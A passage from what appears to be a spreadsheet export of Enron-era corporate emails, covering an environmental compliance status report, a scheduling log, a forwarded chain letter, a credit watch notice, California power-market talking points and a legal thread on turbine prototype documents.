during the OSHA Stakeholder meeting on Confined Spaces in Construction, a=_x000D_
=20_x000D_
proposed rule in the design stage coming under the 29 CFR, Part 1926=20_x000D_
Construction Standards. Current format for the new regulation is to mirror=_x000D_
=20_x000D_
the existing General Industry standard on Permit Required Confined Space=20_x000D_
contained in 29 CFR 1910.146. Statements centred on the areas of concern in=_x000D_
=20_x000D_
amended 1910.146 that resulted in API filing a still unsettled suit in the=_x000D_
=20_x000D_
D.C. Circuit Court, which reflect the same concerns for all Enron companies=_x000D_
=20_x000D_
performing permit required confined space tasks._x000D_
_x000D_
TXOGA Pipeline Environmental Committee - Jim Peterson is preparing=20_x000D_
information on water and waste rulemakings for use at the TXOGA Pipeline=20_x000D_
Environmental Committee Meeting next week._x000D_
_x000D_
ENVIRONMENTAL COMPLIANCE_x000D_
_x000D_
Greenfield Capital Projects_x000D_
_x000D_
Cuiaba II -  Joe Kolb reports that there is some confusion over the amount =_x000D_
of=20_x000D_
gas needed at Cuiaba.  As a result, an additional compressor station may be=_x000D_
=20_x000D_
required.  Another option is to install a booster station at the power plan=_x000D_
t=20_x000D_
until the volume in the pipeline increases enough to justify a permanent=20_x000D_
station._x000D_
_x000D_
Cuiaba I Pipeline - Joe Kolb's trip was postponed by one week to October 28=_x000D_
 -=20_x000D_
November 8 as the request of GOB management._x000D_
_x000D_
Lagos EPP - Joe Kolb has nothing new to report._x000D_
_x000D_
RioGen - Joe Kolb reports that indeed the proposed pipeline route that will=_x000D_
=20_x000D_
serve RioGen will need some rerouting because a portion of it is under a=20_x000D_
now-paved road and through a congested area.  The RioGen EIA includes the C=_x000D_
EG=20_x000D_
pipeline route and it mentions going through a Class III area.   He does no=_x000D_
t=20_x000D_
know yet why this problem was not discovered earlier in the project and wil=_x000D_
l=20_x000D_
confer with Cristiane Ronza (Enron SA) on revisions to the EIA._x000D_
_x000D_
Eletrobolt PP (Brazil) - Joe Kolb has nothing new to report._x000D_
_x000D_
Metgas Pipeline - Joe Kolb reports that the new schedule has a target of a=_x000D_
=20_x000D_
NTP in Sept. '01 and begin construction in Dec. '01.  The main problem is=_x000D_
=20_x000D_
acquiring all of the right-of-way.  The Ministry of Forestry (MOF) has made=_x000D_
=20_x000D_
it clear that we will not get permission to cross any forestry lands unless=_x000D_
=20_x000D_
GAIL (Gas India Limited) is made a partner.  The EIA review panel is expect=_x000D_
ed=20_x000D_
to constituted in October along with a panel to run the public hearing. =20_x000D_
Expect hearing to be in late November or early December._x000D_
_x000D_
Venezuelan LNG - Joe Kolb has nothing new to report._x000D_
_x000D_
Transredes Looping  - Joe Kolb made contact with Tony Henshaw (new VP of EH=_x000D_
&amp;S=20_x000D_
for Transredes) who will arrange for updates on the Looping project while J=_x000D_
oe=20_x000D_
is in Bolivia in early November._x000D_
_x000D_
Project Dolphin - Joe Kolb had nothing new to report._x000D_
_x000D_
Powertel - Joe Kolb has made contact with Annat Jain (Enron India) seeking =_x000D_
to=20_x000D_
understand what environmental planning, studies, and clearances were done f=_x000D_
or=20_x000D_
this project and what role Enron plays in the Joint Venture.  Joe's efforts=_x000D_
=20_x000D_
to arrange a  meeting with Mr. Jain during his time in Houston this week we=_x000D_
re=20_x000D_
to no avail.  Joe will continue to seek the desired information between now=_x000D_
=20_x000D_
and Mr. Jain's next visit to Houston, which is in two weeks._x000D_
_x000D_
Acquisitions_x000D_
_x000D_
Privatenel (Nicaragua) - Don Stevens has been informed that Enron submitted=_x000D_
 a=20_x000D_
$0 bid for the two Gencos on Oct. 10.  The other two bidders (Coastal and=_x000D_
=20_x000D_
Amfels) did the same thing.  ENEL declared void the privatization of=20_x000D_
thermoelectric generators Geosa (115MW) and Gecsa (121MW).  Now the burden =_x000D_
of=20_x000D_
improving the deal is firmly in the hands of the government and we fully=20_x000D_
expect our suggestions to be given full consideration and in large part to =_x000D_
be=20_x000D_
implemented.  As there is intense pressure on Nicaragua from the World Bank=_x000D_
,=20_x000D_
to sell these Gencos, we believe these modifications are already being=20_x000D_
carried-out and that there will be a new bid date set shortly._x000D_
_x000D_
Project ISAGEN (Colombia) - Sandy Verma has informed Don Stevens that the=_x000D_
=20_x000D_
project is currently on hold._x000D_
_x000D_
Project Crane (Quebec, Canada and Port Angeles, Washington) - Don Stevens h=_x000D_
as=20_x000D_
been informed that we are still moving ahead to submit a non-binding bid on=_x000D_
=20_x000D_
Oct. 16 for only the Quebec City facility. We may be required to bid on bot=_x000D_
h=20_x000D_
assets but have no interest in retaining the Port Angeles mill. The goal is=_x000D_
=20_x000D_
to make our bid attractive enough to move to the next round and gain access=_x000D_
=20_x000D_
to more detailed data and information in phase II due diligence._x000D_
_x000D_
Project INGA (California and Pennsylvania) - Don Stevens spoke with Bill=20_x000D_
Keeney regarding EPA Section 112 issues.  EPA has begun preliminary data=20_x000D_
acquisition regarding mercury emissions from coal fired utilities in order =_x000D_
to=20_x000D_
draft proposed regulation.  Bill Keeney is attempting to understand the ris=_x000D_
ks=20_x000D_
involved should the proposed regulations become final in the near term.  At=_x000D_
=20_x000D_
the request of Chip Schneider (RAC), Susan Worthen provided an environmenta=_x000D_
l=20_x000D_
risk summary for the DASH ._x000D_
_x000D_
Project Dragon (Southeast Asia) - Don Stevens has been informed that we hav=_x000D_
e=20_x000D_
terminated any further efforts on this transaction._x000D_
_x000D_
Termoflores (Colombia) - Don Stevens has not heard any news this week on th=_x000D_
e=20_x000D_
project status.  Closing date was last targeting for November._x000D_
_x000D_
Military Base Privatization (Texas AFB) - Don Stevens assisted Charlie=20_x000D_
Thompson (EES) in a meeting with Michael Tribolet (Underwriting) regarding=_x000D_
=20_x000D_
the issue of need for environmental insurance.  Don, Susan Worthen, and Fra=_x000D_
nk=20_x000D_
Smith have all conferred that potential environmental liabilities can be=20_x000D_
identified through existing baselines and further clarified by limited=20_x000D_
sampling near those utilities that EES will take over._x000D_
_x000D_
Military Base Privatization (Maxwell AFB/Gunter Annex) - Don Stevens has no=_x000D_
t=20_x000D_
heard any news this week on the project status._x000D_
_x000D_
CWT Thermo-Depolymerization - Don Stevens has attempted to contact Bruce=20_x000D_
Stram to discuss environmental issues.  Bruce is out of the office until Oc=_x000D_
t.=20_x000D_
16.  Don Stevens discussed various issues with Gene O'Gorman regarding air=_x000D_
=20_x000D_
emissions from the proposed project.  Don and Susan Worthen will meet with=_x000D_
=20_x000D_
Bruce upon his return next week._x000D_
_x000D_
Project Delta - ENA is investigating the possibility of buying underground=_x000D_
=20_x000D_
storage facilities under various stages of development  in the U.S. with th=_x000D_
e=20_x000D_
potential of turning over the asset before they become operational.  As a=_x000D_
=20_x000D_
follow-up to a meeting last week with John Allario (ENA), Don Stevens is=20_x000D_
reviewing Dames &amp; Moore's Preliminary Environmental Reviews of four potenti=_x000D_
al=20_x000D_
underground natural gas storage well locations.  The proposed locations are=_x000D_
=20_x000D_
in the states of Washington, Utah and New Mexico._x000D_
_x000D_
Combined Cycle Plant (Brooklyn, NY) - Don Stevens has been contacted by Way=_x000D_
ne=20_x000D_
Mays regarding permit timing for the installation of 2 each 500,000 lb/hr=_x000D_
=20_x000D_
natural gas fired boilers at an existing combined cycle plant in Brooklyn,=_x000D_
=20_x000D_
NY.  The project is to install two auxiliary boilers so that during peak=20_x000D_
hours all capacity can be shifted to electrical generation.  The current=20_x000D_
target date for installation of the boilers is June 2001.  Enron would be a=_x000D_
=20_x000D_
partner in the plant._x000D_
_x000D_
HVAC Company - At the behest of Dave Nutt, Kyle Roblee (EES) contacted Susa=_x000D_
n=20_x000D_
Worthen about potential due diligence support on a HVAC company EES is=20_x000D_
reviewing.  Originally, Pilko Associates was slated to perform the assessme=_x000D_
nt=20_x000D_
at an extremely high cost.  Kyle has not returned any e-mails or voicemails=_x000D_
;=20_x000D_
therefore, little else is known._x000D_
_x000D_
Dept. Projects_x000D_
_x000D_
Quantitative Risk Module - Don Stevens received ThermoRetec's 'red-lined'=_x000D_
=20_x000D_
Agreement for Project Services and delivered copies to Lanie Borgman. =20_x000D_
Failure to secure a contract for the project within the next week will affe=_x000D_
ct=20_x000D_
the current completion schedule._x000D_
_x000D_
Environmental Professional Services Agreements - Susan Worthen sent Global=_x000D_
=20_x000D_
Strategic Sourcing's Contracts group  the environmental professional servic=_x000D_
e=20_x000D_
agreements obtained from ETS and EE&amp;CC.  She was not successful in obtainin=_x000D_
g=20_x000D_
such agreements from ENA or EES.  This initiative is the result of Susan's=_x000D_
=20_x000D_
experience that rate structures are not consistent among the business units=_x000D_
=20_x000D_
and the desire to streamline the system._x000D_
_x000D_
New Hire Orientation - The EHS/Social Responsibility booth will be ready fo=_x000D_
r=20_x000D_
Monday, October 16.  Orientation is every Monday.  Various documents have=_x000D_
=20_x000D_
been assembled for participants to take._x000D_
_x000D_
e-TV - Susan Worthen is coordinating the production of corporate=20_x000D_
responsibility videos to be featured on e-TV.  Kelly Kimberly and Mike=20_x000D_
Terraso will invite executives to participate._x000D_
_x000D_
Annual Report - The Annual Report has been distributed internally to select=_x000D_
ed=20_x000D_
recipients and senior management._x000D_
_x000D_
Intranet Site - The deadline for the content on the EHS web site was on=20_x000D_
October 11th. There was good participation in information provided for the=_x000D_
=20_x000D_
site, however, we are still lacking information/content in some areas.  Onc=_x000D_
e=20_x000D_
the IT group receives all documents, development will begin on the site. Th=_x000D_
e=20_x000D_
web site is still expected to be functional by November 15th regardless of=_x000D_
=20_x000D_
the status of missing content.  Two third party vendors, CPI and ELR, have=_x000D_
=20_x000D_
submitted their proposals/contracts and they are currently being scrutinize=_x000D_
d=20_x000D_
by the legal department. CPI and ELR will provide EHS legislative and=20_x000D_
regulatory information for the United States on the EHS web site.=20_x000D_
_x000D_
Globalization - Gavin Dillingham completed research regarding whether Enron=_x000D_
=20_x000D_
should develop a policy or statement concerning free trade and=20_x000D_
globalization.  His research indicates that we should .  Lauren Goldblatt,=_x000D_
=20_x000D_
Kelly Kimberly, Mike Terraso, and Susan Worthen will meet the week of the=_x000D_
=20_x000D_
23rd to determine next steps._x000D_
=20_x000D_
Volunteer Activities/Community Relation_x000D_
_x000D_
Buffalo Bayou Challenge - Gavin Dillingham is currently working with Joe Ko=_x000D_
lb=20_x000D_
on developing the Buffalo Bayou Challenge. The proposal will be discussed=_x000D_
=20_x000D_
with Mike Terraso and then a follow-up with Community Relations._x000D_
_x000D_
Other_x000D_
_x000D_
Clean Energy Incubator - Gavin Dillingham is researching the possibility of=_x000D_
=20_x000D_
Enron developing a clean energy technology incubator and will report his=20_x000D_
findings to Mike and Susan._x000D_
_x000D_
Susan Worthen_x000D_
Director_x000D_
Environmental Compliance, Enron Corp_x000D_
713/646-6579  713/345-6164 fax_x000D_
3AC 1525</t>
  </si>
  <si>
    <t>Sun, 13 Jan 2002 19:36:55 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/13/02; HourAhead hour: 22;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/13/02; HourAhead hour: 22;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011322.txt</t>
  </si>
  <si>
    <t>frozenset({'ktracey111@aol.com'})</t>
  </si>
  <si>
    <t>frozenset({'gvfleming@flemingsystems.com', 'davidk@traceylawfirm.com', 'seanpat@flash.net', 'cherylpresnal@aol.com', 'wweighteen@aol.com', 'don.baughman@enron.com', 'shannontyer@email.msn.com', 'albmchic3@aol.com', 'twomarshalls@hotmail.com', 'baughmanpatricia@hotmail.com', 'travieso74@hotmail.com', 'andrea.p.williams@us.pwcglobal.com', 'bargainbarn3@aol.com'})</t>
  </si>
  <si>
    <t>Fwd: KIDS - BETTER OR WORSE ?</t>
  </si>
  <si>
    <t xml:space="preserve">Return-Path: &lt;RhPerkin@piona.com&gt;_x000D_
Received: from  rly-yd02.mx.aol.com (rly-yd02.mail.aol.com [172.18.150.2]) by _x000D_
air-yd02.mail.aol.com (v77_r1.36) with ESMTP; Wed, 16 May 2001 12:18:41 -0400_x000D_
Received: from  mail.piona.com (mail.piona.com [208.178.235.66]) by _x000D_
rly-yd02.mx.aol.com (v77_r1.36) with ESMTP; Wed, 16 May 2001 12:18:23 -0400_x000D_
Received: from hou02.piona.com ([10.3.2.15]) by mail.piona.com (NAVIEG 2.1 _x000D_
bld 63) with SMTP id M2001051611151325336 ; Wed, 16 May 2001 11:15:13 -0500_x000D_
Received: by hou02.piona.com with Internet Mail Service (5.5.2650.21) id _x000D_
&lt;JHTG85P1&gt;; Wed, 16 May 2001 11:26:04 -0500_x000D_
Message-ID: &lt;A67BD0C3BE79D311A931009027CC64FA01FDE63A@hou02.piona.com&gt;_x000D_
From: "Perkins, Rhonda" &lt;RhPerkin@piona.com&gt;_x000D_
To: "Cathie Nesrsta (E-mail)" &lt;Catnesrsta@aol.com&gt;,        "Judy Crawford _x000D_
(E-mail)" &lt;jmc@thorpecorp.com&gt;,        "Kari Tracey _x000D_
(E-mail)"&lt;ktracey111@aol.com&gt;,        "Kelly Jones _x000D_
(E-mail)"&lt;kjones@analyticsolutions.com&gt;,        "Mark Stevens _x000D_
(E-mail)"&lt;Mark-vin@msn.com&gt;,        "Lorri Wilson (E-mail)" _x000D_
&lt;DOWNTOWNTEES@AOL.COM&gt;,        "Pat Lee (E-mail)" _x000D_
&lt;plee@hbcengineering.com&gt;,        "Sandy (E-mail)"&lt;Sandyal55@aol.com&gt;,        _x000D_
"Toqua Niblack (E-mail)" &lt;TOQUA@M-ART.COM&gt;,        "Terry Shoemaker (E-mail)" _x000D_
&lt;SHOEMATL@bp.com&gt;,        "Rich Stromberg _x000D_
(E-mail)"&lt;richard.stromberg@sea.siemens.com&gt;_x000D_
Subject:  KIDS - BETTER OR WORSE ?_x000D_
Date: Wed, 16 May 2001 11:25:57 -0500_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2650.21)_x000D_
Content-Type:  text/plain; charset="iso-8859-1"_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Paul Harvey Writes:_x000D_
_x000D_
We tried so hard to make things better for our kids that we made them_x000D_
worse._x000D_
_x000D_
For my grandchildren, I'd like better.  I'd really like for them to_x000D_
know about hand me down clothes and homemade ice cream and leftover meat_x000D_
loaf sandwiches.  I really would._x000D_
_x000D_
I hope you learn humility by being humiliated, and that you learn_x000D_
honesty by being cheated._x000D_
_x000D_
I hope you learn to make your own bed and mow the lawn and wash the_x000D_
car._x000D_
And I really hope nobody gives you a brand new car when you are_x000D_
sixteen._x000D_
_x000D_
It will be good if at least one time you can see puppies born and your_x000D_
old dog put to sleep. I hope you get a black eye fighting for something_x000D_
you believe in, I hope you have to share a bedroom with your younger_x000D_
brother. And it's all right if you have to draw a line down the middle_x000D_
of the room, but when he wants to crawl under the covers with you_x000D_
because he's scared, I hope you let him._x000D_
_x000D_
When you want to see a movie and your little brother wants to tag_x000D_
along, I hope you'll let him. I hope you have to walk uphill to school with_x000D_
your friends and that you live in a town where you can do it safely. On_x000D_
rainy days when you have to catch a ride, I hope you don't ask your_x000D_
driver to drop you two blocks away so you won't be seen riding with_x000D_
someone as uncool as your Mom._x000D_
_x000D_
If you want a slingshot, I hope your Dad teaches you how to make one_x000D_
instead of buying one. I hope you learn to dig in the dirt and read_x000D_
books. When you learn to use computers, I hope you also learn to add_x000D_
and subtract in  your head._x000D_
_x000D_
I hope you get teased by your friends when you have your first crush on_x000D_
a girl, and when you talk back to your mother that you learn what ivory_x000D_
soap tastes like._x000D_
_x000D_
May you skin your knee climbing a mountain, burn your hand on a stove_x000D_
and stick your tongue on a frozen flagpole.  I don't care if you try a_x000D_
beer once, but I hope you don't like it.  And if a friend offers you_x000D_
dope or a joint, I hope you realize he is not your friend._x000D_
_x000D_
I sure hope you make time to sit on a porch with your Grandpa and go_x000D_
fishing with your Uncle.  May you feel sorrow at a funeral and joy_x000D_
during the holidays.  I hope your mother punishes you when you throw a_x000D_
baseball through your neighbor's window and that she hugs you and_x000D_
kisses you at Christmas timewhen you give her a plaster mold of your hand._x000D_
_x000D_
These things I wish for you - tough times and disappointment, hard work_x000D_
and happiness.  To me, it's the only way to appreciate life._x000D_
_x000D_
Written with a pen.  Sealed with a kiss.  I'm here for you.  And if I_x000D_
die before you do, I'll go to heaven and wait for you._x000D_
_x000D_
Send this to all of your friends.  We secure our friends, not by_x000D_
accepting favors, but by doing them._x000D_
_x000D_
Paul Harvey_x000D_
_x000D_
When asked this riddle, 80% of kindergarten kids got the answer,_x000D_
compared to 17% of Stanford University seniors._x000D_
What is greater than God, More evil than the devil, The poor have it,_x000D_
The rich need it, And if you eat it, you'll die?_x000D_
Send this to 10 people and then press shift and you will get the_x000D_
answer._x000D_
P.S.  You wont believe this, but this really does give you the_x000D_
answer!!!!_x000D_
_x000D_
Pat DiGiacomo,_x000D_
Program Assistant_x000D_
Special Education Dept._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 03:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jim.schwieger@enron.com', 'susan.smith@enron.com', 'paul.choi@enron.com', 'steve.schneider@enron.com', 'kate.fraser@enron.com', 'souad.mahmassani@enron.com', 'james.barker@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'sylvia.pollan@enron.com', 'brad.coleman@enron.com', 'joseph.graham@enron.com', 'bill.kyle@enron.com', 'brad.mckay@enron.com', 'justin.rostant@enron.com', 'dan.mccairns@enron.com', 'lisa.csikos@enron.com', 'kristen.hanson@enron.com', 'jack.simunek@enron.com', 'ron.green@enron.com', 'melissa.graves@enron.com', 'larry.cash@enron.com', 'shonnie.daniel@enron.com', 'brad.horn@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harold.bertram@enron.com', 'susan.pereira@enron.com', 'alicia.jones@enron.com', 'debbie.brackett@enron.com', 'andrew.greer@enron.com', 'thomas.martin@enron.com', 'jane.tholt@enron.com', 'mary.smith@enron.com', 'steven.south@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'mary.cook@enron.com', 'nicole.cortez@enron.com', 'bob.shults@enron.com', 'marde.driscoll@enron.com', 'lucy.ortiz@enron.com', 'sandi.braband@enron.com', 'andrew.lewis@enron.com', 'julie.gomez@enron.com', 'sally.beck@enron.com', 'william.bradford@enron.com', 'edward.baughman@enron.com', 'geoff.storey@enron.com', 'gerald.lofton@enron.com', 'lauri.allen@enron.com', 'ned.higgins@enron.com', 'kim.theriot@enron.com', 'homer.lin@enron.com', 'michael.etringer@enron.com', 'andrea.ring@enron.com', 'jefferson.sorenson@enron.com', 'cheryl.marshall@enron.com', 'barbara.gray@enron.com', 'berney.aucoin@enron.com', 'craig.breslau@enron.com', 'gary.bryan@enron.com', 'cynthia.gin@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nichole.gunter@enron.com', 'david.parquet@enron.com', 'george.smith@enron.com', 'jennifer.fraser@enron.com', 'sandra.brawner@enron.com', 'steve.hooser@enron.com', 'lisa.gillette@enron.com', 'peter.keavey@enron.com', 'tammi.depaolis@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com', 'teresa.mandola@enron.com', 'joanie.ngo@enron.com', 'jake.thomas@enron.com', 'david.eubanks@enron.com', 'jeffrey.austin@enron.com', 'patrick.hanse@enron.com', 'dick.jenkins@enron.com', 'lance.halgren@enron.com', 'sarah.mulholland@enron.com', 'christian.yoder@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'donald.black@enron.com', 'janet.dietrich@enron.com', 'katherine.herrera@enron.com', 'keith.holst@enron.com', 'george.gilbert@enron.com', 'kenneth.kaase@enron.com', 'peggy.banczak@enron.com', 'bryan.hull@enron.com', 'angie.collins@enron.com', 'steve.neal@enron.com', 'eric.gillaspie@enron.com', 'beth.perlman@enron.com', 'marc.horowitz@enron.com', 'kevin.bosse@enron.com', 'janelle.scheuer@enron.com', 'john.singer@enron.com', 'thresa.allen@enron.com', 'lee.papayoti@enron.com', 'stacy.dickson@enron.com', 'drew.hill@enron.com', 'brent.price@enron.com', 'mark.courtney@enron.com', 'robert.walker@enron.com', 'robert.cotten@enron.com', 'sheetal.patel@enron.com', 'james.ducote@enron.com', 'brian.riley@enron.com', 'cary.carrabine@enron.com', 'linda.ewing@enron.com', 'rebecca.ford@enron.com', 'nathan.hlavaty@enron.com', 'debra.perlingiere@enron.com', 'beth.cowan@enron.com', 'daniel.reck@enron.com', 'lisa.mellencamp@enron.com', "martin.o'leary@enron.com", 'bo.petersen@enron.com', 'mike.miller@enron.com', 'greg.mcclendon@enron.com', 'sheila.glover@enron.com', 'stuart.staley@enron.com', 'sunil.dalal@enron.com', 'kyle.lilly@enron.com', 'andrea.hauser@enron.com', 'ann.white@enron.com', 'suzy.robey@enron.com', 'kimberly.olinger@enron.com', 'adam.gross@enron.com', 'bob.schorr@enron.com', 'elizabeth.sager@enron.com', 'fred.lagrasta@enron.com', 'james.shirley@enron.com', 'winston.cheng@enron.com', 'john.grass@enron.com', 'tom.donohoe@enron.com', 'george.hope@enron.com', 'paul.lucci@enron.com', 'monica.roberts@enron.com', 'jung-suk.suh@enron.com', 'candace.bywaters@enron.com', 'kelly.lovvorn@enron.com', 'dianne.swiber@enron.com', 'tana.jones@enron.com', 'tina.valadez@enron.com', 'ragan.bond@enron.com', 'john.lavorato@enron.com', 'hunter.shively@enron.com', "brian.o'rourke@enron.com", 'carol.clair@enron.com', 'maureen.smith@enron.com', 'ray.hamman@enron.com', 'leslie.reeves@enron.com', 'jennifer.blay@enron.com', 'audrey.cook@enron.com', 'greg.wolfe@enron.com', 'edward.gottlob@enron.com', 'bob.bowen@enron.com'})</t>
  </si>
  <si>
    <t>Credit Watch List--9/11/00</t>
  </si>
  <si>
    <t xml:space="preserve">               Attached is a newly revised Credit Watch listing.  If there _x000D_
are any personnel in your group that were not included in this distribution, _x000D_
please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x5-7095, Brant Reves at x3-9897, Veronica Espinoza at x6-6002 or the _x000D_
Global Credit Hotline at x3-1803._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 09:20:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'doggettmark@hotmail.com'})</t>
  </si>
  <si>
    <t>frozenset({'dlyne@apple.com', 'danny.delany@theaustin.com', 'mreid@ushamartinus.com'})</t>
  </si>
  <si>
    <t>This is alot of concrete</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
well guys we filled in a 1/2 of a city block w/ concrete this weekend 12,000 cubic yards, $750,000 worth, or 67 miles of side walk._x000D_
CEMEX  _x000D_
Mark Doggett  _x000D_
Territory Manager  _x000D_
713-410-2267  _x000D_
_x000D_
Send and receive Hotmail on your mobile device: Click Here _x000D_
_x000D_
 - DSC00006.JPG </t>
  </si>
  <si>
    <t>Thu, 16 Sep 1999 04:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Online Indexes</t>
  </si>
  <si>
    <t>Just a 'heads up' - there is now no doubt that there will need to be some _x000D_
major revisions to the index language.  I am meeting with some of the folks _x000D_
from the confirm desks this afternoon to get them started on a further _x000D_
review.  Can you please arrange to have the following people given access to _x000D_
the Product Manager:_x000D_
_x000D_
Jeff Sorenson_x000D_
Dale Neuner_x000D_
Bob Bowen_x000D_
Lynn Shivers_x000D_
Kevin Sweeney</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 06:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mpalmer@enron.com', 'susan.mara@enron.com', 'mona.petrochko@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'karen.denne@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Messaging for Jeff Skilling</t>
  </si>
  <si>
    <t>If there is going to be a play come the first of the year to meld _x000D_
California's PX and ISO, Skilling may want to consider pre-empting that _x000D_
agenda (and most of this is not new; already included in previous messaging _x000D_
points we've developed internally):_x000D_
_x000D_
It's the gas industry, stupid---for profit transcos is the answer._x000D_
California's big mistake was replacing one monopoly--the utility---with _x000D_
another--the PX.  PX's are not necessarily bad things.  But PXs with a _x000D_
monopoly is a very bad thing._x000D_
Forcing the IOUS to buy everything from the PX was irresponsible._x000D_
"Put everyone on a variable rate mortgage" story._x000D_
Decision makers openly admitted that they put in place a strucuture designed _x000D_
NOT to encourage retail choice and competition._x000D_
Decision makers actively urged families and businesses NOT to switch to _x000D_
providers offering an "insurance policy" (i.e., fixed price deals) against _x000D_
the volatile and risky power exchange price._x000D_
When you combine the supply shortage, the PX monopoly, the nonexistant retail _x000D_
market and decision makers' attempts to discourage choice, you get a _x000D_
debacle--that's what California set itself up for, and that's what it got._x000D_
Putting the PX inside the ISO will only infect the wound that's already been _x000D_
inflicted._x000D_
The real answer is....(we've developed these points already)._x000D_
_x000D_
_x000D_
This is quick and dirty and can be made much more punchy and articulate, but _x000D_
wanted to get the notion out there given our time constraints._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 07:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Turbine / Transformer Prototype Documents</t>
  </si>
  <si>
    <t xml:space="preserve">Please send the docs to me only, and I will talk to Ben._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 01/04/2001 03:10 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ben F Jacoby @ ECT                           01/04/2001 02:57 PM_x000D_
	_x000D_
_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: "Campbell, Carolyn" &lt;CCampbell@KSLAW.com&gt; @ ENRON_x000D_
cc: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;@ENRON, "Keffer, John" _x000D_
&lt;JKeffer@KSLAW.com&gt;@ENRON, Fred Mitro/HOU/ECT@ECT, Chris Booth/NA/Enron@Enron _x000D_
_x000D_
Subject: RE: Turbine / Transformer Prototype Documents  _x000D_
_x000D_
Please provide me with copies of these documents, and we'll make the changes. _x000D_
Thanks._x000D_
_x000D_
Ben_x000D_
_x000D_
_x000D_
_x000D_
"Campbell, Carolyn" &lt;CCampbell@KSLAW.com&gt; on 01/04/2001 01:40:40 PM_x000D_
To: "'Ben.F.Jacoby@enron.com'" &lt;Ben.F.Jacoby@enron.com&gt;_x000D_
cc: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;, "Keffer, John" _x000D_
&lt;JKeffer@KSLAW.com&gt; _x000D_
Subject: RE: Turbine / Transformer Prototype Documents_x000D_
_x000D_
_x000D_
Ben:_x000D_
_x000D_
Substantive revisions were made (changing the earnest money concept to a_x000D_
development fee concept, more complete termination provisions, replacing_x000D_
confidentiality provisions with reference to a confidentiality agreement,_x000D_
elimination of provisions addressing mediation) and the prototype documents_x000D_
were recirculated on 12/15/2000.  However, the 12/15/2000 drafts of the_x000D_
documents make specific references to NRG Thermal and contain specific dates_x000D_
that would no longer be relevant.  We would recommend further revision to_x000D_
address these matters before circulating for another potential transaction._x000D_
_x000D_
Carolyn Campbell_x000D_
King &amp; Spalding_x000D_
713-276-7307 (phone)_x000D_
713-751-3280 (fax)_x000D_
CCAMPBELL@KSLAW.COM &lt;mailto:CCAMPBELL@KSLAW.COM&gt;_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Ben.F.Jacoby@enron.com [mailto:Ben.F.Jacoby@enron.com]_x000D_
Sent: Thursday, January 04, 2001 1:19 PM_x000D_
To: Campbell, Carolyn_x000D_
Cc: Kay.Mann@enron.com; Fred.Mitro@enron.com; Chris.Booth@enron.com_x000D_
Subject: Re: Turbine / Transformer Prototype Documents_x000D_
_x000D_
_x000D_
_x000D_
Carolyn:_x000D_
_x000D_
Are these the most recent form documents, or were there any material_x000D_
changes made when we were dealing with NRG on the LM6000s? Please let me_x000D_
know._x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Campbell, Carolyn" &lt;CCampbell@KSLAW.com&gt; on 12/14/2000 04:26:00 PM_x000D_
_x000D_
To:   "'Ben.F.Jacoby@enron.com'" &lt;Ben.F.Jacoby@enron.com&gt;_x000D_
cc:   "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;,_x000D_
      "'Jim.Gilbert@enron.com'" &lt;Jim.Gilbert@enron.com&gt;,_x000D_
      "'Dale.Rasmussen@enron.com'" &lt;Dale.Rasmussen@enron.com&gt;, "Keffer,_x000D_
      John" &lt;JKeffer@KSLAW.com&gt;_x000D_
Subject:  Turbine / Transformer Prototype Documents_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;2RZ501!.DOC&gt;&gt;  &lt;&lt;2R6LRED.DOC&gt;&gt;  &lt;&lt;2RZ601!.DOC&gt;&gt;  &lt;&lt;2RLSRED.DOC&gt;&gt;_x000D_
&lt;&lt;2RZ5RED.DOC&gt;&gt;  &lt;&lt;2RZ801!.DOC&gt;&gt;  &lt;&lt;2RSWRED.DOC&gt;&gt;_x000D_
_x000D_
We have enclosed initial drafts of the following documents:_x000D_
_x000D_
     1.   Letter Agreement for the Turbine Transaction (clean copy and_x000D_
blacklined copy marked to reflect revisions from the current draft of the_x000D_
turbine letter agreement with Coral);_x000D_
_x000D_
     2.   Letter Agreement for the Transformer Transaction (clean_x000D_
copy, blacklined copy marked to reflect revisions from the current draft of_x000D_
the transformer letter agreement with Coral, and blacklined copy marked to_x000D_
reflect revisions from the turbine letter agreement referenced as item no._x000D_
1_x000D_
above);_x000D_
_x000D_
     3.   Limited Liability Company Agreement (clean copy and_x000D_
